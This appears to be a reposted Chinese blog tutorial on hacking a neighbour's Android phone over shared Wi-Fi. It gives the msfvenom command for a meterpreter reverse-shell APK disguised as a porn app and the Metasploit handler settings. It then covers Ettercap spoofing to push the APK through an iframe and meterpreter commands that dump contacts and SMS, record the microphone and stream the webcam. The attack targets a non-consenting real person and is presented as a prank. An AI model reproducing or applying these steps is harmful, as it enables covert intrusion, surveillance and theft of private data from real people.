Msf+Ettercap入侵邻居安卓手机 | 您所在的位置:网站首页 › kali远程入侵安卓手机青云 › Msf+Ettercap入侵邻居安卓手机 |
前言: 连别人的wifi不搞事情怎么可能?最近在学zANTI,不过不熟,咱们依旧kali走起。 做案工具: Kali Linux(咳咳,开始。。。) 正文: 首先启动msf 先用kali生成一个安卓木马,如下命令: Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 然后进入Msf use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.0.109 //ip为kaili的ip set LPORT 44444 //端口一定要与前面生成的木马的端口一致 Exploit 下面我们开启ettercap -G 我物理IP为 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 下面我们来设置一下 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为: 把那两个逗号删了 因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 下面我们开始攻击 大概过了5分钟多,发现反弹成功了 执行命令 dump_contacts --》这个是导出电话 dump_sms --》这个是导出信息 record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_stream Play a video stream from the specified webcam 我们打开看一下电话薄 我们同时欺骗成DroidJack木马,使用方法如图: 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 |
CopyRight 2018-2019 实验室设备网 版权所有 |